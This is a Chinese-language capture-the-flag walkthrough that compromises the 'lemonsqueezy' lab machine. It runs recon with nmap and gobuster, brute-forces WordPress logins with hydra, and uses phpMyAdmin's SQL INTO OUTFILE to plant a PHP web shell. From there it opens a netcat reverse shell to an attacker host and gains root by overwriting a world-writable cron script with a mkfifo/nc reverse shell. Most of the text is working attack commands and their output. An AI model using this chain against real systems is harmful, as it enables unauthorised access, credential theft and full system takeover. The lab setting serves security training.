端口
nmap -Pn -p- 192.168.72.173 PORT STATE SERVICE 80/tcp open http MAC Address: 00:0C:29:B8:2D:FC (VMware)
打点
80端口
主页面是apache2的默认页面,没有robots.txt,我们直接扫描目录
gobuster dir -u http://192.168.72.173/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash /manual/ (Status: 200) [Size: 626] /wordpress/ (Status: 200) [Size: 52276] /javascript/ (Status: 403) [Size: 279] /phpmyadmin/ (Status: 200) [Size: 10531]
发现wordpress之后,查看wordpress主页
主页翻了翻,没有什么敏感信息,尝试hydra爆破
hydra爆破
burp抓包保存请求头到raj文件中,raj文件如下
Host: lemonsqueezy User-Agent: Mozilla/5.0 (Hydra Proxy) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://lemonsqueezy/wordpress/wp-login.php Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://lemonsqueezy Connection: close Cookie: wordpress_test_cookie=WP+Cookie+check Upgrade-Insecure-Requests: 1
写python脚本,将数据包中的信息转成hydra命令
file_array = []
file = input(str())
with open(file,"r") as f:for line in f:file_array.append(":H=" + line.strip().replace(":","\\:"))
header=""
for line in file_array:header += lineprint(line)
print(header)
结果
:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1
hydra爆破用户名
hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -p 123 lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate :H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109 :H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:Invalid" 结果爆破出两个用户,保存到usernames.txt文件: lemon orange
hydra爆破密码
hydra -L usernames.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate :H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109 :H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:incorrect" 爆破出密码: [80][http-post-form] host: lemonsqueezy login: orange password: ginger
登陆后台
看到一个敏感信息,在以Keep this safe!为标题的post下的内容如下
n0t1n@w0rdl1st!
登录phpmyadmin
orange n0t1n@w0rdl1st!
sql语句上传木马
select "<?php system($_GET['a'])?>" into outfile "/var/www/html/wordpress/1.php"
反弹shell
http://lemonsqueezy/wordpress/1.php?a=nc 192.168.72.162 1234 -e /bin/bash
提权
crontab
运行了如下脚本 */2 * * * * root /etc/logrotate.d/logrotate 此外这个脚本是777权限
反弹shell覆盖此文件
echo "mkfifo /tmp/f; nc 192.168.72.162 223 </tmp/f | bash > /tmp/f 2>&1;rm -rf /tmp/f" > /etc/logrotate.d/logrotate 攻击主机监听: nc -nvlp 223
root
[listening on [any] 223 ... connect to [192.168.72.162] from (UNKNOWN) [192.168.72.173] 59534 id uid=0(root) gid=0(root) groups=0(root) whoami root cd /root ls root.txt cat root.txt NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=]()